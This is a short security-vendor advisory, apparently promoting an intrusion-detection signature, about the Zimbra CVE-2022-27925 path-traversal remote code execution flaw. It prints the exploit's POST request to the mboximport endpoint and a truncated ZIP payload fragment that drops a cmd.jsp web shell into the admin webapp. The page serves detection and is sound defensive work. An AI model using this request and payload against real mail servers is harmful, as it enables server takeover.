top of page

Zimbra Remote Code Execution (CVE-2022-27925)

Application Details

Zimbra Collaboration is a cloud based, open-source email platform with integrated and anti-virus.


Zimbra Collaboration could allow a remote authenticated attacker to traverse directories on the system, caused by improper ZIP archive validation by the mboximport function.


An attacker could use a specially crafted URL request containing "dot dot" sequences (/../) to execute arbitrary code on the system.

POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd

PAYLOAD - PK..........
U..*.=...=...0...../../../../mailboxd/webapps/zimbraAdmin/cmd.jsp<%@ page import="java.util.*,*"%>
// cmd.jsp = Command Execution (unix)
// by: Unknown
// modified: 27/06/2003


By turning this into a traffic file and matching rule, we are able to detect attempts to perform remote code execution on an affected system.


Idappcom have created signature 8022991 for this vulnerability.


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here:


bottom of page